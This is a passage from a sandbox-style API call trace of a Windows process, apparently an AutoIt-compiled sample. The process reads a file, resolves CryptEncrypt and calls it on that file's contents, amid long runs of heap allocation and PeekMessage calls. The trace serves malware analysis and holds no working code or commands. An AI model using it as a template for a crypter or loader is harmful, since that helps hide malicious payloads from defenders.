wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0247.973] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0247.973] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0247.973] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0247.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0247.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0247.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0247.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0247.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0247.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0247.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0247.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0247.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0247.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5c020 [0247.977] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0247.977] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x48e1, lpOverlapped=0x0) returned 1 [0247.979] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0247.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0247.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0247.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48e1) returned 0x3bf0050 [0247.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5c020 | out: hHeap=0x970000) returned 1 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0247.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0247.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48e1) returned 0x2f14010 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.983] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0247.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0247.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0247.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0247.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48e1) returned 0x3bf0050 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0247.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.983] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0247.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0247.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0247.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0247.984] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55e30 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0247.984] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0247.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0247.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dd8 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48e1) returned 0x3bf0050 [0247.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54de8 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0247.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e28 [0247.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0247.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0247.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0247.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0247.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0247.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0247.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0247.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0247.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.986] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.986] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0247.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0247.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0247.986] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.986] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0247.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0247.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0247.986] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0247.986] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0247.986] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.986] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0247.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0247.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0247.986] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0247.987] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0247.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0247.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0247.987] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0247.987] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.987] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.987] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0247.987] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.987] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0247.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0247.987] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0247.987] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0247.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51928, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0247.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0247.988] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0247.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0247.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0247.988] CryptEncrypt (in: hKey=0xa87490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x48e1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x48e8) returned 1 [0247.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0247.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0247.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0247.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0247.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0247.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0247.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0247.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0247.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0247.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0247.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0247.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0247.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0247.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0247.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0247.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0247.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0247.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0247.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0247.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0247.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0247.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0247.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0247.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0247.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0247.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0247.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0247.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0247.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0247.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0247.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0247.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0247.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0247.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0247.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0247.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0247.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0247.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0247.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0247.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0247.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0247.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0247.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0247.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0247.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0247.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0247.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0247.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0247.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0247.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0247.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 